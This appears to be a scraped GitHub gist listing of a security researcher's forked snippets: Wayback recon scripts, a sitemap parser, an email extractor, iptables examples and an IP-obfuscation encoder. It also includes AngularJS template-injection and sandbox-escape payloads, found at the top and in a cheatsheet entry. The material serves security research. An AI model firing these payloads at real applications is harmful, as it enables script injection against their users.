// http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html?m=1
{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
bl4de
/ ip_encoder.py
Created
September 4, 2017 10:03
— forked from mhmdiaa/ip_encoder.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| def to_octets(ip): | |
| return [int(i) for i in ip.split('.')] | |
| def dotless_decimal(ip): | |
| octets = to_octets(ip) | |
| result = octets[0] * 16777216 + octets[1] * \ |
bl4de
/ waybackurls.py
Created
July 25, 2017 21:24
— forked from mhmdiaa/waybackurls.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
bl4de
/ reinstall_c5.sh
Created
July 6, 2017 15:13
— forked from a3020/reinstall_c5.sh
Reinstall concrete5
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| REPO_PATH=concrete5-develop | |
| DB_HOST=localhost | |
| DB_USER=root | |
| DB_PASS= | |
| DB_DBAS=concrete5 | |
| ADMIN_EMAIL=no-reply@localhost |
bl4de
/ waybackrobots.py
Created
April 30, 2017 16:45
— forked from mhmdiaa/waybackrobots.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
bl4de
/ xml.py
Created
April 13, 2017 13:47
— forked from chrisguitarguy/xml.py
Parse an XML sitemap with Python, requests and BeautifulSoup
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import with_statement # we'll use this later, has to be here | |
| from argparse import ArgumentParser | |
| import requests | |
| from BeautifulSoup import BeautifulStoneSoup as Soup | |
| def parse_sitemap(url): | |
| resp = requests.get(url) | |
| # we didn't get a valid response, bail |
bl4de
/ AngularTI.md
Last active
October 24, 2017 13:52
— forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
bl4de
/ extract_emails_from_text.py
Created
February 22, 2017 16:22
— forked from dideler/example.md
A python script for extracting email addresses from text files.
You can pass it multiple files. It prints the email addresses to stdout, one address per line. For ease of use, remove the .py extension and place it in your $PATH (e.g. /usr/local/bin/) to run it like a built-in command.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # Extracts email addresses from one or more plain text files. | |
| # | |
| # Notes: | |
| # - Does not save to file (pipe the output to a file if you want it saved). | |
| # - Does not check for duplicates (which can easily be done in the terminal). | |
| # | |
| # (c) 2013 Dennis Ideler <ideler.dennis@gmail.com> |
bl4de
/ angular.sandbox.escapes.md
Created
January 14, 2017 18:17
— forked from jeremybuis/angular.sandbox.escapes.md
Angular Sandbox Escape Cheatsheet
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
bl4de
/ iptables_rules.sh
Created
December 4, 2016 11:16
— forked from virtualstaticvoid/iptables_rules.sh
25 Most Frequently Used Linux IPTables Rules Examples
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Modify this file accordingly for your specific requirement. | |
| # http://www.thegeekstuff.com | |
| # 1. Delete all existing rules | |
| iptables -F | |
| # 2. Set default chain policies | |
| iptables -P INPUT DROP | |
| iptables -P FORWARD DROP | |
| iptables -P OUTPUT DROP |
bl4de
/ .gitignore
Created
November 15, 2016 12:30
— forked from gergelyke/.gitignore
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logs | |
| logs | |
| *.log | |
| npm-debug.log* | |
| # Runtime data | |
| pids | |
| *.pid | |
| *.seed |